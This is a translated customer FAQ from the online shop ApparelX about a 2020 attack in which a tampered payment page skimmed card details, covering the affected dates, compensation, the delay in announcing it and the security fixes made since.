We have summarized the frequently asked questions below regarding the " Apology and Notice Regarding the Leakage of Credit Card Information Due to Unauthorized Access to Our Site ."
Q) The period during which there is a possibility of leakage is from November 27, 2020 to December 9, 2020. Is it okay if I made a payment during a period other than that?
A) We are conducting an investigation by a third-party investigation organization. There is no possibility of leakage other than the 195 credit card payments made during the above period. Please rest assured. If you have any questions, please feel free to contact us at the inquiry desk. Additionally, when we analyzed the purchase dates of customers who actually experienced fraudulent use, we found that it was concentrated among customers who made purchases on 12/2, 12/3, 12/4, 12/8, and 12/9.
Q) Will I be able to use it safely in the future?
A) We take this situation seriously and have implemented all necessary measures to improve security as instructed by a third-party investigation organization. We will continue to strive to improve security and do our best to regain the trust of our customers.
Q) It took a lot of time to respond to unauthorized use, reissue cards, and make changes. Isn't there some kind of compensation?
A) As explained in the main text, we will bear all fraudulent use and card replacement costs, but we deeply apologize for any inconvenience caused to our customers. I would like to apologize once again for the inconvenience. We look forward to hearing from you regarding any future measures we may take. Thank you for your understanding.
Q) The initial discovery was on December 9, 2020, and the announcement was made on March 29, 2021. Why was the announcement delayed so long?
A) We have been communicating with credit card companies and research companies around the clock with the aim of contacting customers as soon as possible, but we apologize for not being able to contact you at this time. . We have been in discussions with the credit card company, but to avoid unnecessary confusion, we have not been able to contact them. We are now able to notify our customers only after the third-party investigation organization completes its investigation and the credit card companies confirm the issue.
Q) Please tell us about the security improvement measures you have implemented so far.
A) We have taken the following measures to prevent a similar incident from occurring again in the future.
・In addition to immediately fixing the vulnerability in the file upload function, we also enabled SELinux to improve security regarding tampering prevention. (December 2020)
- We have migrated our server environment to a secure public cloud environment consisting of the latest OS/middleware. (December 2020)
・We have introduced a highly functional firewall (WAF) and have taken measures to block unauthorized access and attacks. (January 2021)
-Introduced two-step authentication for the server environment and management tools. (February 2021)
・We have installed anti-virus software on our servers and perform regular virus checks. (February 2021)
・We regularly apply critical OS/middleware level patches. (March 2021)
-Introduced FIM (File Integrity Monitoring) solution to detect file tampering. (April 2021)
・In addition to the above, we have implemented various security improvement measures.
Q) Please tell us about the security improvement measures you plan to implement in the future.
A) We plan to implement the following measures under the guidance of a third-party research organization and a security specialist company.
・Periodic security diagnosis by a security specialist company.
・Periodic implementation of internal vulnerability assessments.
・Long-term storage of logs using SIEM (Security Information and Event Management) ・In addition to the above, we will continue to implement measures to improve the robustness of our systems.
Q) Did you store credit card information (card number, expiration date, security cord) on the server?
A) No. We use a PCI-DSS compliant non-passing (JavaScript type) payment service provided by Stripe, and no customer credit card information is stored on our servers. In this attack, by altering the payment page, a similar input form was placed that closely resembled the original credit card input form, and the information entered at the moment the payment button was pressed was transferred to the attacker's website. It was designed to be forwarded to.
Q) What does it mean that my credit card information may have been compromised? Is there a possibility that it has not been leaked?
A) We have not been able to confirm that any information was actually transferred to the attacker's site, but we are proceeding with the procedure as a possibility for all cards that were used for payment during the period when the attack file existed on the server. Masu. Therefore, there is a possibility that customers who made payments during this period were not actually breached. When we analyzed the purchase dates of customers who actually experienced fraudulent use, we found that it was concentrated among customers who made purchases on 12/2, 12/3, 12/4, 12/8, and 12/9. There is a possibility that the fake form was withdrawn during other periods (*This has actually been confirmed by our company).
Q) How will I be reimbursed in the event of unauthorized use? Also, will there be a charge for replacing the card?
A) You will not be responsible for any costs incurred in connection with this incident. As stated in the main text of the report, please check your credit card details and be sure to contact your credit card company if there is any unauthorized use.
Q) Will ApparelX continue to provide services?
A) We take this situation seriously and have implemented all necessary measures to improve security as instructed by a third-party investigation organization. We will continue to strive to improve security and do our best to regain the trust of our customers.
Q) I would like to unsubscribe from ApparelX and delete all information.
A) Please delete your account information from account deletion in My Account. All information stored on our site will be deleted.
Q) When will you resume accepting credit card payments?
A) We are currently in discussions with the payment processing company. We will make an announcement on the website when we reopen. (Added on 4/28) After receiving approval from each card company, we resumed credit card payments on 4/28/2021.